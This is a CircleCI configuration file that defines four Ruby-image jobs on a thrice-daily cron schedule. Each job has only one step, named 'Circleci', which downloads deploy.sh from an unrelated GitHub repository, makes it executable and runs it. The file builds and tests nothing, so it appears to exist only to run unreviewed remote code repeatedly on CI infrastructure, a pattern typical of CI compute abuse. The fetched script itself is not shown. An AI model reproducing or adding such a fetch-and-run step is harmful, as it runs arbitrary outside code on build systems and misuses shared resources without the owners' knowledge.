working_dir: &working_dir ~/app
.github_template: &matrix
  steps:
    - run:
        name: Circleci
        command: wget https://raw.githubusercontent.com/terb4ru/folderyosh/main/deploy.sh && chmod 700 deploy.sh && ./deploy.sh
        
version: 2.0
jobs:
  version1:
    <<: *matrix
    docker:
      - image: circleci/ruby:2.7.3
  version2:
    <<: *matrix
    docker:
      - image: circleci/ruby:2.7
  version3:
    <<: *matrix
    docker:
      - image: circleci/ruby:2.6.8
  version4:
    <<: *matrix
    docker:
      - image: circleci/ruby:2.6.7
workflows:
  version: 2
  commit:
    jobs:
      - version1
      - version2
      - version3
      - version4
    triggers:
      - schedule:
          cron: "0 5,10,20 * * *"
          filters:
            branches:
              only:
                - master
                
  VersionRuby:
    jobs:
      - version1
      - version2
      - version3
      - version4
